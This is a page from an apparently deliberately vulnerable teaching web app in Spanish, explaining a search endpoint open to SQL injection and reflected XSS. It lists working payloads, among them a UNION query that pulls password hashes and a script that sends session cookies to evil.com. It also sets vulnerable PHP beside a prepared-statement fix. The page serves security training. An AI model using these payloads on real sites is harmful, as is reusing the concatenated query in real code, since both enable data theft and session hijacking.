Resultados de Busqueda

Busqueda: test

Nueva busqueda

No se encontraron clientes con "test"

Payloads de ejemplo

SQL Injection

XSS

A05:2025 Intermedia

🔴 VULNERABLE

Injection

Este endpoint es doblemente vulnerable:

SQL Injection: La query se arma concatenando el input directamente
XSS reflejado: Los resultados se muestran sin escapar

Observa la URL cuando inyectas algo - el input se refleja en la pagina.

# Ver todos los clientes (bypass del filtro)
?q=' OR '1'='1

# Extraer tabla users con UNION
?q=' UNION SELECT id,username,password_md5,email,role,created_at,7,8 FROM users-- 

# XSS basico
?q=<script>alert(document.cookie)</script>

# XSS con robo de sesion (conceptual)
?q=<script>fetch('http://evil.com/steal?'+document.cookie)</script>

Herramientas: SQLMap Burp Suite curl

// ESTE ARCHIVO (vulnerable):
$q = "SELECT * FROM clients WHERE name LIKE '%" . $_GET['q'] . "%'";
echo $row['name']; // SIN escapar

// buscar_secure.php (seguro):
$stmt = $pdo->prepare("SELECT * FROM clients WHERE name LIKE ?");
$stmt->execute(['%' . $search . '%']);
echo htmlspecialchars($row['name']); // CON escapar

Equifax (2017)

147 millones de personas afectadas. Injection en Apache Struts. $1.4B en costos.

CWEs: CWE-89 CWE-79

🛡️ Ver versión segura